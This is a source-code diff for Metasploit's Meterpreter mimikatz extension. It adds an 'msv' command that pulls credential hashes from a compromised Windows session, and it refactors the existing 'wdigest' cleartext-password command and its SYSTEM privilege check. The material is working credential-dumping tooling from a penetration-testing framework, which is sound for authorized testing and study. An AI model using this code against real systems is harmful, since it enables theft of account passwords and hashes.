Added msv

Author: Meatballs1

lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb

@@ -33,7 +33,7 @@ def initialize(client)
 			])
 	end
 
-	def wdigest()
+	def wdigest
 		request = Packet.create_request('mimikatz_wdigest')
 		response = client.send_request(request)
 		result = Rex::Text.to_ascii(response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT))
@@ -51,8 +51,27 @@ def wdigest()
 			accounts << account	
 		end
 		return accounts
-	end	
+	end
+	
+	def msv
+                request = Packet.create_request('mimikatz_msv1_0')
+                response = client.send_request(request)
+                result = Rex::Text.to_ascii(response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT))
 
+                details = CSV.parse(result)
+                accounts  =  []
+                details.each do |acc|
+                        account = {
+                                :authid => acc[0],
+                                :package => acc[1],
+                                :user => acc[2],
+                                :domain => acc[3],
+                                :password => acc[4]
+                        }
+                        accounts << account
+                end
+                return accounts
+	end
 end
 
 end; end; end; end; end

lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb

@@ -30,37 +30,66 @@ def initialize(shell)
 	def commands
 		{
 			"wdigest" => "Attempt to retrieve cleartext wdigest passwords",
+			"msv" => "Attempt to retrieve hashes",
 		}
 	end
 
 	def cmd_wdigest(*args)
-		system_privilege_check
-		print_status("Getting privileges")
-		client.sys.config.getprivs
-		print_status("Retrieving passwords")
-		accounts = client.mimikatz.wdigest
-		
-		table = Rex::Ui::Text::Table.new(
-			'Indent' => 0,
-			'SortIndex' => 4,
-			'Columns' =>
-			[
-				'AuthID', 'Package', 'Domain', 'User', 'Password'
-			]
-		)
-			
-		accounts.each do |acc|
-			table << [acc[:authid], acc[:package], acc[:domain], acc[:user],  acc[:password]]	
-		end
+		unless system_check
+                        print_status("Attempting to get getprivs")
+                        client.sys.config.getprivs
+                end
+                print_status("Retrieving passwords")
+                accounts = client.mimikatz.wdigest
+                
+                table = Rex::Ui::Text::Table.new(
+                        'Indent' => 0,
+                        'SortIndex' => 4,
+                        'Columns' =>
+                        [
+                                'AuthID', 'Package', 'Domain', 'User', 'Password'
+                        ]
+                )
+                        
+                accounts.each do |acc|
+                        table << [acc[:authid], acc[:package], acc[:domain], acc[:user],  acc[:password]]       
+                end
 
-		table.print	
+                table.print     
 
-		return true
+                return true
+	end
+
+	def cmd_msv(*args)
+                unless system_check
+                        print_status("Attempting to get getprivs")
+                        client.sys.config.getprivs
+                end
+                print_status("Retrieving passwords")
+                accounts = client.mimikatz.msv
+                
+                table = Rex::Ui::Text::Table.new(
+                        'Indent' => 0,
+                        'SortIndex' => 4,
+                        'Columns' =>
+                        [
+                                'AuthID', 'Package', 'Domain', 'User', 'Hash'
+                        ]
+                )
+                        
+                accounts.each do |acc|
+                        table << [acc[:authid], acc[:package], acc[:domain], acc[:user],  acc[:password]]       
+                end
+
+                table.print     
+
+                return true
 	end
 
-	def system_privilege_check
+	def system_check
 		if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
 			print_warning("Not currently running as SYSTEM")
+			return false
 		end
 
 		return true